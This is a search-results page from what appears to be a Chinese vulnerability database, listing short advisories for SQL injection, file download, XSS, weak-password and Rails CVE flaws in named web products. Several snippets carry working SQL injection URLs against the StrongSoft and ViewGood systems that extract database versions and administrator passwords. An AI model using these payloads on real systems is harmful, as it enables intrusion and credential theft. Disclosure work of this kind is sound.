56796 matches found
wizBank®学习管理系统任意文件下载漏洞
wizBank学习管理系统文件下载功能没有对下载的文件名称和类型进行严格检查和过滤,恶意用户可通过构造特殊的路径下载指定的文件。 wizBank学习管理系统的\www\cw\skin1\jsp\download.jsp文件的源代码如下: code 区域 ,从代码可见,没有对下载的文件名称和类型进行严格检查和过滤,恶意用户可通过构造特殊的路径下载指定的文件。...
Ruby On Rails Paperclip跨站脚本漏洞
No description provided by source...
Ruby on Rails rails-html-sanitizer XSS 漏洞
XSS vulnerability in rails-html-sanitizer There is a XSS vulnerability in Rails::Html::FullSanitizer used by Action View's striptags. This vulnerability has been assigned the CVE identifier CVE-2015-7579. Versions Affected: 1.0.2 Not affected: 1.0.0, 1.0.1 Fixed Versions: 1.0.3 Impact Due to the...
Ruby on Rails activesupport远程拒绝服务漏洞
Impact Specially crafted XML documents can cause applications to raise a SystemStackError and potentially cause a denial of service attack. This only impacts applications using REXML or JDOM as their XML processor. Other XML processors that Rails supports are not impacted. All users running an...
Ruby on Rails jquery-ujs和jquery-rails安全绕过漏洞
Impact In the scenario where an attacker might be able to control the href attribute of an anchor tag or the action attribute of a form tag that will trigger a POST action, the attacker can set the href or action to " https://attacker.com" note the leading space that will be passed to JQuery, who...
Knoica Minolta FTP CWD命令缓冲区溢出漏洞
No description provided by source...
Ruby on Rails Web Console IP 白名单安全模式绕过
IP whitelist bypass in Web Console There is a remote code execution vulnerability in Web Console. This vulnerability has been assigned the CVE identifier CVE-2015-3224. Versions Affected: All Not affected: Environments inaccessible from remote IPs, or without Web Console enabled Fixed Versions:...
Ruby on Rails ActiveModel::Name远程拒绝服务漏洞
No description provided by source...
Rails Dynamic Render 远程命令执行漏洞 (CVE-2016-0752)
如果你的应用程序使用的动态模版路径 例如: render params:id 那么你的程序将会存在远程代码执行和本地文件包含漏洞. 请把你的 Rails 升级到最新版本, 或者重构你的 controllers。 我们将展示如何在特定环境下使用代码执行和本地包含漏洞去攻击 Ruby on Rails 。 Rails的控制器有包含指定渲染文件的功能,举个例子, 当我们调用 show 方法的时候,如果没有定义其他渲染方法,该框架将会隐藏渲染 show.html.erb 文件。 在绝大多数情况下,开发者会输出不同的格式,例如:文本, JSON, XML 或者其他任何格式,或者查看一个文件,...
万户OA办公系统 informationmanager_download.jsp 任意文件下载漏洞
No description provided by source...
Shadows-IT Designs Local File Inclusion
No description provided by source...
Mao10CMS user_register.php 添加超级管理员逻辑漏洞
No description provided by source...
phpwind V9.0 /windid/admin.php 验证码绕过漏洞
No description provided by source...
用友u8 CmxItem.php SQL注入
No description provided by source...
StrongSoft灾害预警系统ReportingDetail.aspx ID参数SQL注入漏洞
注入链接:/Disaster/Reporting/ReportingDetail.aspx 注入参数:ID 【获取数据库版本】 /Disaster/Reporting/ReportingDetail.aspx?ID=1' AND 3=CHAR@@version -- 【管理员账号密码】 /Disaster/Reporting/ReportingDetail.aspx?ID=1' AND+2709=select+top+1+UserID%2b'---'%2bUserPwd+from+strongmain.dbo.WebSystemUser--...
php168 知道模块 /zhidao/user.php?j=question&u SQL注入漏洞
No description provided by source...
FreeBSD 远程拒绝服务攻击漏洞
0x01 漏洞复现 此漏洞是由于FreeBSD在处理ipv6数据包时,某函数对于数据的检验不严格,导致若传入的ipv6结构体某成员函数为NULL时,在后续函数调用中会触发assert,导致freebsd进入异常处理机制,内核崩溃引发系统重启,下面对此漏洞进行详细分析。 首先对于漏洞环境的搭建我不讲解了,在我的微信公众号上发了一篇文章专门讲解FreeBSD环境的搭建,包括内核调试,vmtools安装等等,环境搭建好之后,通过执行poc.py,发现程序重启,重启过程中,/var/crash下会生成崩溃信息。...
泛微E-Office /inc/priv_user_list/priv_xml.php SQL注入漏洞
0x01 框架概述 泛微e-office是泛微公司面向中小型组织推出的OA产品,简单易用高效,部署快、投资少。提供免费试用体验。至今已为超过一万家客户提供方便高效的办公体验. 官方主页: www.weaver.com.cn 主页截图如下。 0x02 漏洞信息 先对系统进行解密。 /inc/privuserlist/privxml.php 大概18行开始 $pararr = explodestpar $REQUEST'par' ; $userpriv = $pararr'userpriv'; ... if $pararr'viewtype' == 0 unset $deptnameutf8...
Joomla com_docman 组件路径泄露和本地文件包含漏洞
No description provided by source...
齐博(qibocms) /blog/template/space/file/listbbs.php $TB_pre 参数SQL注入漏洞
No description provided by source...
TRS WCM parseXMLFile()函数 XXE漏洞
No description provided by source...
StrongSoft灾害预警系统strFieldName参数SQL注入漏洞
注入链接:/Response/AjaxHandle/AjaxSingleGetReferenceFieldValue.ashx 注入参数:strFieldName 【获取数据库版本】 /Response/AjaxHandle/AjaxSingleGetReferenceFieldValue.ashx?strFieldValue=1&strSelectFieldCollection=1&tableName=sysobjects&strFieldName=convertint,@@version 【管理员账号密码】...
用友致远A6协同系统messageViewer.jsp三处SQL注入漏洞
No description provided by source...
phpyun v4.0 api/locoy/model/news.class.php SQL注入漏洞
No description provided by source...
金融化一卡通系统越权添加管理员
/managerNManager.action http://.../xykcx/managerNManager.action...
StrongSoft灾害预警系统 warn/AjaxHandle/AjaxOuterWarnForMerger.ashx DeptID参数SQL注入漏洞
注入链接:/warn/AjaxHandle/AjaxOuterWarnForMerger.ashx 注入参数:DeptID 【获取数据库版本】 /warn/AjaxHandle/AjaxOuterWarnForMerger.ashx?action=GetCheckIdByPid&DeptID=1'+AND+2709=SELECT+@@version+AND+'EcwM'='EcwM 【获取当前数据库】...
Huawei VRP telnet 弱口令
No description provided by source...
Shop7z order_checknoprint.asp id 参数 SQL注入漏洞
No description provided by source...
1caitong电子采购系统 Company_Show.aspx 参数ID SQL注入漏洞
No description provided by source...
StrongSoft灾害预警系统 /Report/AjaxHandle/StationChoose/StationSearch.ashx stationName 参数SQL注入漏洞
注入链接:/Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=1&stationType='KKK'&sqlWhere= 注入参数:stationName 【获取数据库版本】/Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName='+and+1=2++union+all+select+@@version,NULL--&stationType='KKK'&sqlWhere=...
ZTE OLT C200 telnet 弱口令
No description provided by source...
YouYaX宽字节盲注
No description provided by source...
Zfsoft OA系统 gwxxbviewhtml.do 任意文件下载漏洞
No description provided by source...
MoMoCMS_v3.1 install/index.php重装系统
MoMoCMSv3.1企业建站系统 Install/index.php里没有进行判断lock,你们能判断一下lock吗? 在install/index.php $document.readyfunction / setup navigation, content boxes, etc... / // validate signup form on keyup and submit var validator = $"loginform".validate rules: dbhost: "required", dbname: "required", dbuser: "required",...
远古流媒体系统 GetCaption.ashx注入漏洞
/ADI/portal/GetCaption.ashx?CaptionType=1%27%20and%201%3Dconvert%28int%2C%28char%28116%29%252bchar%28121%29%252bchar%28113%29%252bdbname%28%29%252bCHAR%28116%29%252bCHAR%28121%29%252bCHAR%28113%29%29%29--&AssetID=1&CaptionName=11...
易企CMS install/install.php 代码执行
看代码\install\install.php 作用就是安装该cms,然后把install.php改为install.php.bak。由于apache解析问题,改文件还是会解析成php,然后就可以暴力getshell。 数据库连接文件会写到\include\config.inc.php 由于是双引号可直接shell,无限制。...
泛微e-cology /web/careerapply/HrmCareerApplyAdd.jsp 文件 careerid 参数SQL注入漏洞
No description provided by source...
远古流媒体系统 query_user_password_qustion.aspx SQL 注入漏洞
/viewgood/webmedia/portal/queryuserpasswordqustion.aspx?username=1%27%20AND%201%3DCONVERT%28int%2C%20CHAR%28116%29%20%2b%20CHAR%28121%29%20%2b%20CHAR%28113%29%2b@@version%2b%20CHAR%28116%29%20%2b%20CHAR%28121%29%20%2b%20CHAR%28113%29%29%20AND%20%271%27%3D%271...
远古流媒体系统 pic_proxy.aspx SQL 注入漏洞
/viewgood/webmedia/portal/picproxy.aspx?id=1%20and%201%3Dconvert%28int%2C%20CHAR%28116%29%20%2b%20CHAR%28121%29%20%2b%20CHAR%28113%29%2bdbname%2b%20CHAR%28116%29%20%2b%20CHAR%28121%29%20%2b%20CHAR%28113%29%29--&type=2...
远古流媒体系统 POST注入漏洞
username=%27%20and%201%3Dconvert%28int%2C%20CHAR%28116%29%20%2b%20CHAR%28121%29%20%2b%20CHAR%28113%29%2bdbname%28%29%2bCHAR%28116%29%20%2b%20CHAR%28121%29%20%2b%20CHAR%28113%29%29-- URL:http://xxx.com/VIEWGOOD/ADI/portal/UserDataSync.aspx POST:UserGUID=1' and...
Joomla! 组件 JE Guestbook v1.0 参数view SQL注入漏洞
No description provided by source...
KingCMS V9 manage.php 任意用户密码重置漏洞
No description provided by source...
StrongSoft灾害预警系统ContactUpdate.aspx ContactID参数SQL注入漏洞
注入链接:/Duty/MailList/ContactUpdate.aspx 注入参数:ContactID Payload:ContactID=-1+and+1=@@version...
YouYaX saveself.html 储存型 xss
No description provided by source...
Youyax lib/indexaction.php 二次注入
No description provided by source...
乐知行教务系统 /datacenter/downloadApp/loadAppInfo.do versionType 参数SQL注入漏洞
No description provided by source...
三星(Samsung) SyncThruWeb 2.01.00.26 - SMB散列泄露漏洞
No description provided by source...
HiShop商城系统 Isv.ashx 直接添加管理员设计缺陷
No description provided by source...
TRS init_sysUsers.xml 信息泄漏漏洞
No description provided by source...
shopnum1 GuidBuyList.aspx SQL注入漏洞
No description provided by source. !/usr/bin/env python coding: utf-8 from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils import register import requests import re class TestPOCPOCBase: vulID = '' ssvid version = '1.0' author = '烽火戏诸侯' vulDate = ' 2015-06-09'...